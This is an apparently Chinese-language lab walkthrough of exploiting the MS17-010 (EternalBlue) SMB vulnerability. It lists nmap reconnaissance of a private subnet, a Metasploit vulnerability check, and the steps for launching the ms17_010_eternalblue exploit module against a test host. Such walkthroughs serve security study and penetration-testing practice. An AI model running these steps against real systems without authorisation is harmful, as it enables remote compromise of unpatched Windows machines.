ms17-010(永恒之蓝)实现过程

186 阅读1分钟

Ms17-010漏洞攻击过程

先输入指令 sudo su 获得 root 权限

获得root权限.png

1.情报收集

输入 ifconfig 查看主机 IP 地址

主机IP.png

通过主机IP输入nmap 192.168.181.1-254 来扫描同一网段下的其他IP地址

目标IP.png

目标主机IP地址为192.168.181.130

然后输入nmap –v –T4 –A 192.168.181.130

端口445是开启状态.png

发现靶机端口445为开启状态

输入ping 192.168.181.130

ping通靶机.png

发现可以ping通

2.威胁建模

启用msf,输入指令msfconsole

威胁建模1.png

威胁建模2.png

3.漏洞分析

输入指令search ms17-010搜索漏洞

搜索漏洞ms17-010.png

输入指令use 3

使用序号为3的辅助模块 auxiliary/scanner/smb/smb_ms17_010

使用序号为3的攻击模块.png

输入指令show options查看漏洞模块

查看漏洞模块.png

漏洞模块信息中所有required显示yes的都是需要配置信息的

为RHOSTS配置信息

输入指令set RHOSTS 192.168.181.130

目标为RHOSTS.png

配置好后,输入指令show options再次检查配置情况

RHOSTS current setting.png

4.检测是否存在该漏洞

输入指令run

开始运行

开始攻击.png

发现存在漏洞,使用之前序号为0的攻击模块

输入use exploit/windows/smb/ms17_010_eternalblue

使用序号为0的攻击模块.png

eternalblue.png

显示payload已就绪

输入指令show options查看配置信息

查看配置信息.png

输入指令set RHOSTS 192.168.181.130来配置攻击目标IP

为攻击目标配置IP.png 最后输入指令run

ms17-010攻击成功.png ms17-010攻击成功